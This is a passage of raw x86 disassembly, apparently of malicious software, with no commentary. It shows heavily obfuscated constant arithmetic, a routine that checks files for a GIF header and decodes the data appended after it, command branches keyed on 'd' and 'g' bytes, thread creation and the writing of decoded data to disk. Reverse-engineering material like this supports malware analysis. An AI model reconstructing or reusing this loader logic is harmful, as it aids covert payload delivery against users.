mov [ebp-14h], eax
lea eax, [ebp-14h]
push eax
push dword ptr ds:10013970h[edi*4]
call dword ptr ds:1001382Ch
cmp dword ptr [ebp-14h], 103h
jz short loc_41E4EA
push dword ptr ds:10013970h[edi*4]
call dword ptr ds:1001282Ch
and dword ptr ds:10013970h[edi*4], 0
loc_41E4EA: ; CODE XREF: .data:0041E4AE�j
; .data:0041E4D3�j
lea eax, [ebp-0Eh]
push eax
call dword ptr ds:10013844h
mov [ebp-4], eax
cmp eax, 3
jz short loc_41E52A
cmp eax, 4
jz short loc_41E52A
cmp eax, 2
jz short loc_41E52A
cmp dword ptr ds:10013970h[edi*4], 0
jz loc_41E5CD
movsx ebx, word ptr ds:1001423Ch
sub ebx, 5
mov ds:100105E0h[edi*4], ebx
jmp loc_41E5CD
; ---------------------------------------------------------------------------
loc_41E52A: ; CODE XREF: .data:0041E4FA�j
; .data:0041E4FF�j ...
push 1
call dword ptr ds:1000EFB0h
lea eax, [ebp-24h]
push eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-18h]
push eax
lea eax, [ebp-0Eh]
push eax
call dword ptr ds:10010088h
mov ebx, ds:1001413Ch
sub ebx, 8
cmp eax, ebx
jnz short loc_41E57F
cmp dword ptr ds:10013970h[edi*4], 0
jz short loc_41E5CD
movsx ebx, word ptr ds:10014120h
movsx edx, word ptr ds:100140B4h
add ebx, edx
sub ebx, 0Dh
mov ds:100105E0h[edi*4], ebx
jmp short loc_41E5CD
; ---------------------------------------------------------------------------
loc_41E57F: ; CODE XREF: .data:0041E557�j
cmp dword ptr ds:10013970h[edi*4], 0
jnz short loc_41E5CD
mov ds:100105E0h[edi*4], edi
lea eax, [ebp-28h]
push eax
mov eax, ds:10014140h
movsx edx, word ptr ds:10014144h
add eax, edx
sub eax, 12h
push eax
lea ebx, ds:100105E0h[edi*4]
push ebx
push 100028E8h
movsx ebx, word ptr ds:10014180h
sub ebx, 5
push ebx
push 0
call dword ptr ds:10013D70h
mov ds:10013970h[edi*4], eax
loc_41E5CD: ; CODE XREF: .data:0041E50E�j
; .data:0041E525�j ...
inc edi
loc_41E5CE: ; CODE XREF: .data:0041E470�j
cmp edi, 5Ah
jbe loc_41E475
movsx eax, word ptr ds:10014228h
sub eax, 4
push eax
call dword ptr ds:1001380Ch
pop ecx
jmp loc_41E46B
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E5F5 proc near ; CODE XREF: .data:0041EE32�p
; .data:0041EF20�p
var_1000C = dword ptr -1000Ch
var_10003 = byte ptr -10003h
var_FFFF = byte ptr -0FFFFh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
mov eax, 10004h
call sub_425D5D
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
lea edi, ds:10011430h
cmp [ebp+arg_4], 43h
jnz short loc_41E61A
lea edi, ds:100100A0h
loc_41E61A: ; CODE XREF: sub_41E5F5+1D�j
push 0
push 80h
push 3
push 0
push 3
push 0C0000000h
push edi
call dword ptr ds:10013968h
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_41E6CF
push 0
push 0
push esi
push edi
call dword ptr ds:10013D80h
push 0
lea eax, [ebp+var_4]
push eax
push 0FFFFh
lea eax, [ebp+var_10003]
push eax
push edi
call dword ptr ds:1000D02Ch
lea ecx, [ebp+var_FFFF]
or eax, 0FFFFFFFFh
loc_41E66C: ; CODE XREF: sub_41E5F5+7C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41E66C
mov edx, ds:100141B0h
sub edx, 2
mov ebx, eax
add ebx, edx
mov [ebp+var_4], ebx
mov ebx, ds:100141CCh
add ebx, ds:100141E4h
mov edx, [ebp+var_4]
mov [ebp+ebx*4+var_1000C+1], edx
push 0
push 0
push esi
push edi
call dword ptr ds:10013D80h
push 0
lea eax, [ebp+var_4]
push eax
mov eax, ds:10014158h
add eax, ds:100140C8h
sub eax, 6
push eax
lea eax, [ebp+var_10003]
push eax
push edi
call dword ptr ds:10013D6Ch
push edi
call dword ptr ds:1001282Ch
loc_41E6CF: ; CODE XREF: sub_41E5F5+43�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E5F5 endp
; ---------------------------------------------------------------------------
mov eax, 80004001h
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E6DC proc near ; CODE XREF: sub_4247D1+3C�p
; sub_4247D1+C7�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_0]
movzx ebx, byte ptr [eax]
mov eax, ds:100140ECh
add eax, 0FAh
imul ebx, eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+1]
add ebx, eax
mov eax, ds:10014224h
add eax, 0FBh
imul ebx, eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+2]
add ebx, eax
movsx esi, word ptr ds:10014204h
sub esi, 6
jmp short loc_41E761
; ---------------------------------------------------------------------------
loc_41E721: ; CODE XREF: sub_41E6DC+95�j
mov edi, ds:100140A8h
dec edi
sub edi, esi
mov edx, [ebp+arg_4]
mov [ebp+var_4], edx
mov edx, ebx
and edx, 8000003Fh
jge short loc_41E73F
dec edx
or edx, 0FFFFFFC0h
inc edx
loc_41E73F: ; CODE XREF: sub_41E6DC+5C�j
mov ecx, ds:1001427Ch
mov dl, [ecx+edx]
mov ecx, [ebp+var_4]
mov [ecx+edi], dl
mov eax, ebx
mov ecx, ds:1001418Ch
add ecx, 3Fh
cdq
idiv ecx
mov ebx, eax
add esi, 1
loc_41E761: ; CODE XREF: sub_41E6DC+43�j
mov eax, ds:10014214h
add eax, ds:10014244h
sub eax, 6
cmp esi, eax
jl short loc_41E721
pop edi
pop esi
pop ebx
leave
retn
sub_41E6DC endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 21Ch
push ebx
push esi
push edi
lea eax, [ebp-210h]
push eax
push 100100A0h
call sub_422C67
add esp, 8
mov [ebp-208h], eax
test eax, eax
jnz short loc_41E7A9
xor eax, eax
jmp loc_41E92C
; ---------------------------------------------------------------------------
loc_41E7A9: ; CODE XREF: .data:0041E7A0�j
mov eax, ds:100140D4h
add eax, 4
mov [ebp-204h], eax
loc_41E7B7: ; CODE XREF: .data:0041E918�j
mov eax, [ebp-204h]
mov edx, [ebp-208h]
lea ecx, [edx+eax]
or eax, 0FFFFFFFFh
loc_41E7C9: ; CODE XREF: .data:0041E7CE�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41E7C9
mov [ebp-20Ch], eax
cmp dword ptr [ebp-20Ch], 0FFh
jnb short loc_41E806
mov eax, [ebp-204h]
mov edx, ds:10014244h
sub edx, 8
add eax, edx
add eax, [ebp-208h]
push eax
lea eax, [ebp-0FFh]
push eax
call sub_425D7D
loc_41E806: ; CODE XREF: .data:0041E7E0�j
mov eax, ds:1001415Ch
mov esi, eax
add esi, ds:1001410Ch
jmp short loc_41E83A
; ---------------------------------------------------------------------------
loc_41E815: ; CODE XREF: .data:0041E84C�j
cmp byte ptr [ebp+esi-0FFh], 28h
jnz short loc_41E827
mov byte ptr [ebp+esi-0FFh], 2Bh
loc_41E827: ; CODE XREF: .data:0041E81D�j
cmp byte ptr [ebp+esi-0FFh], 29h
jnz short loc_41E839
mov byte ptr [ebp+esi-0FFh], 3Dh
loc_41E839: ; CODE XREF: .data:0041E82F�j
inc esi
loc_41E83A: ; CODE XREF: .data:0041E813�j
lea ecx, [ebp-0FFh]
or eax, 0FFFFFFFFh
loc_41E843: ; CODE XREF: .data:0041E848�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41E843
cmp esi, eax
jb short loc_41E815
push 0FFh
lea eax, [ebp-1FEh]
push eax
lea eax, [ebp-0FFh]
push eax
call sub_41BB4B
add esp, 0Ch
mov ebx, eax
mov edi, ds:10014244h
sub edi, 9
jmp short loc_41E8A4
; ---------------------------------------------------------------------------
loc_41E876: ; CODE XREF: .data:0041E8A6�j
movsx eax, byte ptr [ebp+edi-1FEh]
mov [ebp-218h], eax
mov eax, edi
mul edi
mov [ebp-21Ch], eax
mov eax, [ebp-218h]
mov edx, [ebp-21Ch]
sub eax, edx
mov [ebp+edi-1FEh], al
inc edi
loc_41E8A4: ; CODE XREF: .data:0041E874�j
cmp edi, ebx
jb short loc_41E876
mov eax, ds:100141ECh
sub eax, 5
push eax
push dword ptr [ebp+8]
lea eax, [ebp-1FEh]
push eax
call sub_4251A5
add esp, 0Ch
mov [ebp-214h], eax
mov eax, ds:10014224h
add eax, 0FFF4h
add eax, ds:100141F8h
cmp [ebp-214h], eax
jz short loc_41E8F2
push dword ptr [ebp-208h]
call dword ptr ds:100105CCh
xor eax, eax
inc eax
jmp short loc_41E92C
; ---------------------------------------------------------------------------
loc_41E8F2: ; CODE XREF: .data:0041E8DF�j
mov eax, [ebp-20Ch]
mov edx, ds:100141B4h
add edx, ds:10014184h
add eax, edx
add [ebp-204h], eax
mov eax, [ebp-210h]
cmp [ebp-204h], eax
jb loc_41E7B7
push dword ptr [ebp-208h]
call dword ptr ds:100105CCh
xor eax, eax
loc_41E92C: ; CODE XREF: .data:0041E7A4�j
; .data:0041E8F0�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E931 proc near ; CODE XREF: .data:0041AA90�p
var_275 = byte ptr -275h
var_274 = byte ptr -274h
var_270 = byte ptr -270h
var_26C = byte ptr -26Ch
var_267 = byte ptr -267h
var_203 = byte ptr -203h
var_10C = byte ptr -10Ch
var_106 = byte ptr -106h
var_FF = byte ptr -0FFh
var_FE = byte ptr -0FEh
var_FA = byte ptr -0FAh
push ebp
mov ebp, esp
sub esp, 278h
push edi
lea eax, [ebp+var_203]
push eax
mov eax, ds:100140C8h
movsx edx, word ptr ds:10014220h
add eax, edx
sub eax, 9
push eax
push 0
push 1Ch
push 0
call dword ptr ds:10010A00h
lea eax, [ebp+var_267]
push eax
call sub_41EBDE
push 1001538Fh
call sub_41B08F
mov edi, ds:100140B0h
sub edi, 4
push edi
lea edi, [ebp+var_267]
push edi
lea edi, [ebp+var_203]
push edi
push eax
push 10011220h
call dword ptr ds:10013810h
push 1001537Ch
call sub_41B08F
mov edi, ds:10014150h
add edi, 3
push edi
lea edi, [ebp+var_203]
push edi
push eax
push 100100A0h
call dword ptr ds:10013810h
push 10015369h
call sub_41B08F
mov edi, ds:100140BCh
add edi, ds:10014104h
dec edi
push edi
lea edi, [ebp+var_203]
push edi
push eax
push 10011430h
call dword ptr ds:10013810h
lea eax, ds:10008F97h
mov ds:10013804h, eax
lea eax, ds:10008F97h
mov ds:1000E000h, eax
lea eax, ds:1000536Bh
mov ds:10013954h, eax
push 1000EFD0h
call sub_41F6A1
mov eax, ds:1001422Ch
movsx edx, word ptr ds:10014194h
add eax, edx
sub eax, 3
push eax
push 100111F0h
call sub_4240DE
lea eax, ds:10007FDFh
mov ds:100111ECh, eax
lea eax, ds:10008ECBh
mov ds:100109E4h, eax
lea eax, ds:100100A0h
mov ds:10012814h, eax
lea eax, ds:10011430h
mov ds:1000D018h, eax
lea eax, ds:10013850h
mov ds:1001433Ch, eax
lea eax, [ebp+var_26C]
push eax
mov eax, ds:1001410Ch
add eax, ds:100141ACh
sub eax, 5
push eax
push 0
push 10001D58h
mov eax, ds:10014168h
add eax, ds:10014218h
sub eax, 12h
push eax
push 0
call dword ptr ds:10013D70h
push eax
call dword ptr ds:1001282Ch
lea eax, [ebp+var_270]
push eax
movsx eax, word ptr ds:10014128h
sub eax, 5
push eax
push 0
push 1000B6AEh
mov eax, ds:100140A4h
sub eax, 9
push eax
push 0
call dword ptr ds:10013D70h
push eax
call dword ptr ds:1001282Ch
lea eax, [ebp+var_274]
push eax
mov eax, ds:100141B4h
sub eax, 4
push eax
push 0
push 1000602Fh
movsx eax, word ptr ds:10014190h
sub eax, 5
push eax
push 0
call dword ptr ds:10013D70h
push eax
call dword ptr ds:1001282Ch
movsx eax, word ptr ds:10014110h
add eax, 0Ah
mov ds:100105D0h, eax
mov eax, ds:100140D4h
inc eax
push eax
lea eax, [ebp+var_FF]
push eax
call sub_424146
add esp, 58h
mov eax, ds:10014140h
add eax, ds:100141B4h
cmp [ebp+eax+var_10C], 64h
jnz short loc_41EB84
movsx eax, [ebp+var_FE]
mov edx, ds:10014248h
add edx, 19h
add edx, ds:10014230h
sub eax, edx
mov [ebp+var_275], al
movzx eax, [ebp+var_275]
push eax
push 0
call sub_4210C1
add esp, 8
mov eax, ds:10014170h
add eax, ds:10014238h
sub eax, 0Eh
mov ds:100105D0h, eax
loc_41EB84: ; CODE XREF: sub_41E931+20E�j
mov eax, ds:10014178h
add eax, ds:100141C8h
cmp [ebp+eax+var_106], 67h
jnz short loc_41EBDB
mov eax, ds:100141D0h
mov edx, ds:100141A8h
sub edx, 8
mov [ebp+eax+var_FA], dl
lea eax, [ebp+var_FE]
push eax
call dword ptr ds:1000E008h
mov [ebp-278h], eax
push eax
push 10013850h
call sub_423599
add esp, 0Ch
movsx eax, word ptr ds:10014148h
mov ds:100105D0h, eax
loc_41EBDB: ; CODE XREF: sub_41E931+266�j
pop edi
leave
retn
sub_41E931 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EBDE proc near ; CODE XREF: sub_41E931+36�p
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push edi
mov edi, [ebp+arg_0]
push 104h
lea eax, [ebp+var_108]
push eax
call dword ptr ds:100105B0h
mov eax, ds:100140D4h
add eax, 3
add eax, ds:1001415Ch
movsx edx, word ptr ds:10014130h
sub edx, 2
mov [ebp+eax+var_108], dl
push 104h
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_10C]
push eax
push 104h
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_108]
push eax
call dword ptr ds:100137E4h
push 10015361h
call sub_41B08F
push [ebp+var_10C]
push eax
push edi
call dword ptr ds:10013810h
add esp, 10h
mov eax, ds:100140ECh
add eax, ds:10014224h
sub eax, 0Bh
mov [ebp+var_4], eax
jmp short loc_41ECAD
; ---------------------------------------------------------------------------
loc_41EC7E: ; CODE XREF: sub_41EBDE+E3�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, 30h
jl short loc_41EC94
cmp al, 39h
jg short loc_41EC94
mov eax, [ebp+var_4]
add eax, edi
add byte ptr [eax], 31h
loc_41EC94: ; CODE XREF: sub_41EBDE+A8�j
; sub_41EBDE+AC�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, 41h
jl short loc_41ECAA
cmp al, 5Ah
jg short loc_41ECAA
mov eax, [ebp+var_4]
add eax, edi
add byte ptr [eax], 20h
loc_41ECAA: ; CODE XREF: sub_41EBDE+BE�j
; sub_41EBDE+C2�j
inc [ebp+var_4]
loc_41ECAD: ; CODE XREF: sub_41EBDE+9E�j
movsx eax, word ptr ds:10014190h
mov edx, ds:100140E0h
lea eax, [eax+edx+1]
cmp [ebp+var_4], eax
jb short loc_41EC7E
pop edi
leave
retn
sub_41EBDE endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov esi, [ebp+8]
mov eax, [ebp+18h]
mov [ebp+18h], ax
movsx eax, word ptr ds:10014114h
add eax, ds:100140BCh
dec eax
cmp ds:100105D0h, eax
jnb short loc_41ECFC
mov eax, ds:100140A8h
sub eax, 4
mov ds:100105D0h, eax
loc_41ECFC: ; CODE XREF: .data:0041ECED�j
mov eax, ds:100140A4h
movsx edx, word ptr ds:100141B8h
mov edi, eax
add edi, edx
sub edi, 0Eh
jmp short loc_41ED1D
; ---------------------------------------------------------------------------
loc_41ED11: ; CODE XREF: .data:0041ED32�j
lea edx, ds:1000F0E0h[edi*4]
cmp esi, edx
jz short loc_41ED34
inc edi
loc_41ED1D: ; CODE XREF: .data:0041ED0F�j
mov eax, ds:100141E8h
add eax, 3DDh
movsx edx, word ptr ds:100140E8h
add eax, edx
cmp edi, eax
jb short loc_41ED11
loc_41ED34: ; CODE XREF: .data:0041ED1A�j
mov eax, ds:1001414Ch
add eax, 3DBh
add eax, ds:10014224h
cmp edi, eax
jnz short loc_41ED4F
xor eax, eax
jmp loc_41EF80
; ---------------------------------------------------------------------------
loc_41ED4F: ; CODE XREF: .data:0041ED46�j
and dword ptr [ebp-4], 0
lea eax, [ebp-4]
push eax
push 10015CD4h
mov edx, ds:1000D050h[edi*4]
push dword ptr ds:1000D050h[edi*4]
mov edx, [edx]
call dword ptr ds:0[edx]
mov ebx, eax
lea eax, [ebp-8]
push eax
mov eax, [ebp-4]
push eax
mov edx, [eax]
call dword ptr [edx+48h]
mov ebx, eax
mov eax, ds:100141B0h
sub eax, 7
cmp ebx, eax
jnz short loc_41EE06
lea eax, [ebp-0Ch]
push eax
push 10015C44h
mov eax, [ebp-8]
push eax
mov edx, [eax]
call dword ptr ds:0[edx]
mov ebx, eax
movsx eax, word ptr ds:100140F8h
add eax, ds:10014184h
sub eax, 2
cmp ebx, eax
jnz short loc_41EDFD
lea eax, [ebp-10h]
push eax
mov eax, [ebp-0Ch]
push eax
mov edx, [eax]
call dword ptr [edx+20h]
mov ebx, eax
mov eax, ds:10014094h
sub eax, 2
cmp ebx, eax
jnz short loc_41EDF4
mov eax, ds:10014174h
add eax, ds:10014118h
sub eax, 5
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-4]
call sub_4239D8
add esp, 0Ch
loc_41EDF4: ; CODE XREF: .data:0041EDD5�j
mov eax, [ebp-0Ch]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_41EDFD: ; CODE XREF: .data:0041EDBA�j
mov eax, [ebp-8]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_41EE06: ; CODE XREF: .data:0041ED8E�j
movzx edx, word ptr ds:10010A10h[edi*2]
movsx ecx, word ptr ds:10014144h
add ecx, ds:10014224h
sub ecx, 0Dh
cmp edx, ecx
jnz short loc_41EE49
movzx eax, byte ptr ds:100101B0h[edi]
push eax
push dword ptr ds:1000E010h[edi*4]
call sub_41E5F5
add esp, 8
and dword ptr ds:1000F0E0h[edi*4], 0
xor eax, eax
jmp loc_41EF80
; ---------------------------------------------------------------------------
loc_41EE49: ; CODE XREF: .data:0041EE20�j
movzx edx, word ptr ds:10010A10h[edi*2]
mov ecx, ds:10014208h
add ecx, 0FFF3h
movsx eax, word ptr ds:1001421Ch
add ecx, eax
cmp edx, ecx
jnz loc_41EF5B
movsx eax, word ptr ds:100140F8h
movsx edx, word ptr ds:10014180h
add eax, edx
sub eax, 6
mov [ebp-14h], eax
jmp loc_41EF44
; ---------------------------------------------------------------------------
loc_41EE89: ; CODE XREF: .data:0041EF51�j
mov edx, [ebp-14h]
mov [ebp-18h], edx
mov ecx, edx
shl ecx, 2
mov [ebp-1Ch], ecx
cmp dword ptr ds:1000F0E0h[ecx], 0
jz loc_41EF41
movzx eax, word ptr ds:10010A10h[edx*2]
movsx edx, word ptr ds:10014144h
movsx ecx, word ptr ds:100140C4h
lea edx, [edx+ecx+0FFEDh]
cmp eax, edx
jz short loc_41EF41
mov edx, ds:1000E010h[edi*4]
mov ecx, [ebp-1Ch]
cmp ds:1000E010h[ecx], edx
jnz short loc_41EF41
mov edx, [ebp-18h]
mov dl, ds:100101B0h[edx]
cmp dl, ds:100101B0h[edi]
jnz short loc_41EF41
mov edx, [ebp-14h]
movzx edx, word ptr ds:10010A10h[edx*2]
mov ecx, ds:1001420Ch
movsx eax, word ptr ds:10014220h
add ecx, eax
sub ecx, 0Dh
cmp edx, ecx
jnz short loc_41EF32
mov edx, [ebp-14h]
movzx ecx, byte ptr ds:100101B0h[edx]
push ecx
push dword ptr ds:1000E010h[edx*4]
call sub_41E5F5
add esp, 8
and dword ptr ds:1000F0E0h[edi*4], 0
jmp short loc_41EF57
; ---------------------------------------------------------------------------
loc_41EF32: ; CODE XREF: .data:0041EF0B�j
mov edx, [ebp-14h]
lea edx, ds:10010A10h[edx*2]
dec word ptr [edx]
jmp short loc_41EF57
; ---------------------------------------------------------------------------
loc_41EF41: ; CODE XREF: .data:0041EE9F�j
; .data:0041EEC4�j ...
inc dword ptr [ebp-14h]
loc_41EF44: ; CODE XREF: .data:0041EE84�j
mov eax, ds:1001419Ch
add eax, 3DFh
cmp [ebp-14h], eax
jb loc_41EE89
loc_41EF57: ; CODE XREF: .data:0041EF30�j
; .data:0041EF3F�j
xor eax, eax
jmp short loc_41EF80
; ---------------------------------------------------------------------------
loc_41EF5B: ; CODE XREF: .data:0041EE68�j
movzx edx, word ptr ds:10010A10h[edi*2]
mov ecx, ds:1001409Ch
add ecx, ds:10014118h
sub ecx, 6
cmp edx, ecx
jle short loc_41EF7E
dec word ptr ds:10010A10h[edi*2]
loc_41EF7E: ; CODE XREF: .data:0041EF74�j
xor eax, eax
loc_41EF80: ; CODE XREF: .data:0041ED4A�j
; .data:0041EE44�j ...
pop edi
pop esi
pop ebx
leave
retn 24h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EF87 proc near ; CODE XREF: sub_41D8BA+211�p
; sub_41D8BA+223�p
var_61DA0 = dword ptr -61DA0h
var_61D9C = dword ptr -61D9Ch
var_61D98 = byte ptr -61D98h
var_61C99 = byte ptr -61C99h
var_61C98 = dword ptr -61C98h
var_61C91 = byte ptr -61C91h
var_30F51 = byte ptr -30F51h
var_30F50 = dword ptr -30F50h
var_30F4B = byte ptr -30F4Bh
var_30E4C = dword ptr -30E4Ch
var_30E48 = dword ptr -30E48h
var_30E44 = dword ptr -30E44h
var_30E3F = byte ptr -30E3Fh
var_30E3E = byte ptr -30E3Eh
var_30E3D = byte ptr -30E3Dh
var_30E3C = byte ptr -30E3Ch
var_30E3B = byte ptr -30E3Bh
var_30E3A = byte ptr -30E3Ah
var_30E15 = byte ptr -30E15h
var_30E14 = byte ptr -30E14h
var_30DBE = byte ptr -30DBEh
var_30DBD = byte ptr -30DBDh
var_30DBC = byte ptr -30DBCh
var_30D4C = byte ptr -30D4Ch
var_30D47 = byte ptr -30D47h
var_30D40 = byte ptr -30D40h
var_30D3F = byte ptr -30D3Fh
var_30D37 = byte ptr -30D37h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 61DA0h
call sub_425D5D
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
and [ebp+var_30F50], 0
push 0
movsx eax, word ptr ds:10014114h
movsx edx, word ptr ds:10014204h
add eax, edx
sub eax, 0Fh
push eax
push 3
push 0
movsx eax, word ptr ds:10014194h
sub eax, 9
push eax
push 80000000h
push [ebp+arg_0]
call dword ptr ds:10013968h
mov [ebp+var_30E48], eax
cmp eax, 0FFFFFFFFh
jz loc_41F437
push 0
lea eax, [ebp+var_30E4C]
push eax
mov eax, ds:10014174h
add eax, 81h
movsx edx, word ptr ds:100140A0h
add eax, edx
push eax
lea eax, [ebp+var_30E3F]
push eax
push [ebp+var_30E48]
call dword ptr ds:1000D02Ch
mov [ebp+var_30E44], eax
mov eax, ds:10014208h
movsx edx, word ptr ds:10014098h
add eax, edx
sub eax, 0Bh
cmp [ebp+var_30E44], eax
jz loc_41F419
cmp [ebp+var_30E3F], 47h
jnz short loc_41F06C
cmp [ebp+var_30E3E], 49h
jnz short loc_41F06C
cmp [ebp+var_30E3D], 46h
jnz short loc_41F06C
cmp [ebp+var_30E3C], 38h
jnz short loc_41F06C
cmp [ebp+var_30E3B], 39h
jnz short loc_41F06C
cmp [ebp+var_30E3A], 61h
jz short loc_41F071
loc_41F06C: ; CODE XREF: sub_41EF87+B6�j
; sub_41EF87+BF�j ...
jmp loc_41F419
; ---------------------------------------------------------------------------
loc_41F071: ; CODE XREF: sub_41EF87+E3�j
movzx eax, [ebp+var_30E15]
mov edx, ds:100141A0h
add edx, 3Bh
cmp eax, edx
jnz short loc_41F097
cmp [ebp+var_30DBE], 3Dh
jnz short loc_41F097
cmp [ebp+var_30DBD], 3Dh
jz short loc_41F09C
loc_41F097: ; CODE XREF: sub_41EF87+FC�j
; sub_41EF87+105�j
jmp loc_41F419
; ---------------------------------------------------------------------------
loc_41F09C: ; CODE XREF: sub_41EF87+10E�j
or ebx, ebx
jnz short loc_41F0CB
mov al, [ebp+var_30DBC]
mov [ebp+var_30F51], al
call sub_4213EC
mov edx, eax
mov [ebp+var_61C99], dl
mov al, [ebp+var_61C99]
cmp al, [ebp+var_30F51]
jz loc_41F419
loc_41F0CB: ; CODE XREF: sub_41EF87+117�j
push 0
lea eax, [ebp+var_30E4C]
push eax
push 30D40h
lea eax, [ebp+var_61C91]
push eax
push [ebp+var_30E48]
call dword ptr ds:1000D02Ch
mov [ebp+var_30E44], eax
mov eax, ds:10014140h
movsx edx, word ptr ds:10014180h
add eax, edx
sub eax, 0Eh
cmp [ebp+var_30E44], eax
jz loc_41F419
mov eax, [ebp+var_30E4C]
movsx edx, word ptr ds:100140B4h
add edx, ds:10014218h
sub edx, 0Dh
mov [ebp+eax+var_61C91], dl
push 30D40h
lea eax, [ebp+var_30D40]
push eax
lea eax, [ebp+var_61C91]
push eax
call sub_41BB4B
add esp, 0Ch
mov esi, eax
mov eax, ds:10014244h
mov edi, eax
add edi, ds:100140ECh
sub edi, 0Fh
jmp short loc_41F1A0
; ---------------------------------------------------------------------------
loc_41F15B: ; CODE XREF: sub_41EF87+21B�j
or ebx, ebx
jz short loc_41F172
movzx eax, [ebp+edi+var_30D40]
sub eax, edi
mov [ebp+edi+var_30D40], al
jmp short loc_41F19F
; ---------------------------------------------------------------------------
loc_41F172: ; CODE XREF: sub_41EF87+1D6�j
movzx eax, [ebp+edi+var_30D40]
mov [ebp+var_61D9C], eax
mov eax, edi
mul edi
mov [ebp+var_61DA0], eax
mov eax, [ebp+var_61D9C]
mov edx, [ebp+var_61DA0]
sub eax, edx
mov [ebp+edi+var_30D40], al
loc_41F19F: ; CODE XREF: sub_41EF87+1E9�j
inc edi
loc_41F1A0: ; CODE XREF: sub_41EF87+1D2�j
cmp edi, esi
jb short loc_41F15B
or ebx, ebx
jz short loc_41F1D4
mov eax, ds:10014224h
movsx edx, word ptr ds:10014120h
add eax, edx
sub eax, 0Dh
mov edx, esi
sub edx, eax
movsx eax, word ptr ds:1001412Ch
add eax, ds:100140D4h
sub eax, 8
mov [ebp+edx+var_30D40], al
loc_41F1D4: ; CODE XREF: sub_41EF87+21F�j
mov eax, ds:1001415Ch
add eax, 7Dh
add eax, ds:100141F8h
mov edx, ds:1001417Ch
sub edx, 9
mov [ebp+eax+var_30E3F], dl
push 0FFh
lea eax, [ebp+var_61D98]
push eax
lea eax, [ebp+var_30E14]
push eax
call sub_41BB4B
lea eax, [ebp+var_61D98]
push eax
push esi
lea eax, [ebp+var_30D40]
push eax
call sub_41F4A9
add esp, 18h
mov [ebp+var_30E44], eax
mov eax, ds:100140A8h
sub eax, 4
cmp [ebp+var_30E44], eax
jnz loc_41F419
mov [ebp+var_30F50], 1
or ebx, ebx
jz loc_41F379
mov eax, ds:100140FCh
cmp [ebp+eax+var_30D47], 64h
jnz loc_41F2E6
movzx eax, [ebp+var_30D3F]
mov edx, ds:10014108h
add edx, 10h
movsx ecx, word ptr ds:100140F4h
add edx, ecx
sub eax, edx
mov byte ptr [ebp+var_61D9C+3], al
movzx eax, byte ptr [ebp+var_61D9C+3]
push eax
push 0
call sub_4210C1
mov eax, ds:100140DCh
mov ds:100105D0h, eax
movsx eax, word ptr ds:100140B8h
sub eax, 9
mov ds:1001431Ch, eax
movsx eax, word ptr ds:100140C4h
mov edx, ds:100140ECh
add edx, ds:100140ACh
sub edx, 0Bh
mov [ebp+eax+var_30D47], dl
movsx eax, word ptr ds:10014180h
add eax, ds:10014178h
sub eax, 9
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_4214DC
add esp, 10h
loc_41F2E6: ; CODE XREF: sub_41EF87+2D3�j
mov eax, ds:10014188h
add eax, ds:100141BCh
cmp [ebp+eax+var_30D4C], 67h
jnz loc_41F419
mov eax, ds:100141E4h
mov edx, ds:10014100h
add edx, ds:100141B0h
sub edx, 0Eh
mov [ebp+eax+var_30D37], dl
lea eax, [ebp+var_30D3F]
push eax
call dword ptr ds:1000E008h
mov [ebp+var_61D9C], eax
push eax
push 10013850h
call sub_423599
mov eax, ds:10014100h
sub eax, 7
mov ds:100105D0h, eax
movsx eax, word ptr ds:100140F8h
add eax, ds:1001414Ch
sub eax, 9
mov ds:1001431Ch, eax
movsx eax, word ptr ds:100140C4h
sub eax, 8
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_4214DC
add esp, 14h
jmp loc_41F419
; ---------------------------------------------------------------------------
loc_41F379: ; CODE XREF: sub_41EF87+2C0�j
movsx eax, word ptr ds:100141C0h
sub eax, 2
push eax
lea eax, [ebp+var_30F4B]
push eax
call sub_4240DE
push 10015359h
call sub_41B08F
push eax
lea edx, [ebp+var_30F4B]
push edx
call dword ptr ds:1000D024h
push 0
push 80h
push 2
push 0
push dword ptr ds:10014240h
push 40000000h
lea eax, [ebp+var_30F4B]
push eax
call dword ptr ds:10013968h
mov [ebp+var_61C98], eax
push 0
lea eax, [ebp+var_30E4C]
push eax
push esi
lea eax, [ebp+var_30D40]
push eax
push [ebp+var_61C98]
call dword ptr ds:10013D6Ch
